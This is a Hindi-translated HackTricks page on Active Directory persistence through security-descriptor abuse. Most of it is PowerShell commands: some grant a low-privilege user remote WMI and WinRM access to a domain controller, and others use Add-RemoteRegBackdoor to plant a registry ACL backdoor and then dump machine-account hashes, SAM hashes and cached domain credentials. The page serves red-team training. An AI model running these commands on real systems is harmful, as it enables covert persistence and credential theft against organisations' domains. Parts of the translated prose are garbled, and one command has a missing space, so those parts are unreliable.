hacktricks/windows-hardening/active-directory-methodology/security-descriptors.md

8.4 KiB
Raw Blame History

सुरक्षा विवरण

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

सुरक्षा विवरण

दस्तावेज़ से: सुरक्षा विवरण परिभाषा भाषा (SDDL) उस प्रारूप को परिभाषित करता है जिसका उपयोग सुरक्षा विवरण को वर्णित करने के लिए किया जाता है। SDDL डेकल और SACL के लिए ACE स्ट्रिंग का उपयोग करता है: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;

सुरक्षा विवरण का उपयोग अन्य वस्तुओं पर वस्तु के अधिकार संग्रहित करने के लिए किया जाता है। यदि आप किसी वस्तु के सुरक्षा विवरण में केवल थोड़ा सा परिवर्तन कर सकते हैं, तो आप उस वस्तु पर बहुत दिलचस्प विशेषाधिकार प्राप्त कर सकते हैं जिसके लिए आपको किसी विशेषाधिकृत समूह के सदस्य होने की आवश्यकता नहीं है।

फिर, यह स्थायित्व तकनीक उस क्षमता पर आधारित है कि विशेष वस्तुओं के खिलाफ आवश्यक प्रत्येक विशेषाधिकार जीतने की क्षमता, एक कार्य को करने की क्षमता होनी चाहिए जो सामान्यत: व्यवस्थापक विशेषाधिकारों की आवश्यकता होती है लेकिन व्यवस्थापक होने की आवश्यकता नहीं है।

WMI तक पहुंच

आप एक उपयोगकर्ता को दूरस्थ WMI को क्रियान्वित करने की अनुमति दे सकते हैं इसका उपयोग करके:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dcnamespace 'root\cimv2' -Remove -Verbose #Remove

WinRM तक पहुंच

इसका उपयोग करके एक उपयोगकर्ता को winrm PS कंसोल तक पहुंच दें:

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove

दूरस्थ पहुंच से हैश तक पहुंच

रजिस्ट्री तक पहुंचें और हैश डंप बनाएं, DAMP** का उपयोग करके** रेग बैकडोर बनाएं, ताकि आप किसी भी समय कंप्यूटर के हैश, SAM और कंप्यूटर में किसी भी कैश्ड AD क्रेडेंशियल को पुनः प्राप्त कर सकें। इसलिए, एक सामान्य उपयोगकर्ता को इस अनुमति को दोमेन कंट्रोलर कंप्यूटर के खिलाफ देना बहुत उपयुक्त है:

# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose

# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose

जांचें सिल्वर टिकट कैसे आप डोमेन कंट्रोलर के कंप्यूटर अकाउंट के हैश का उपयोग कर सकते हैं।

जानें जीरो से हीरो तक AWS हैकिंग को htARTE (HackTricks AWS Red Team Expert) सीखें!

HackTricks का समर्थन करने के अन्य तरीके: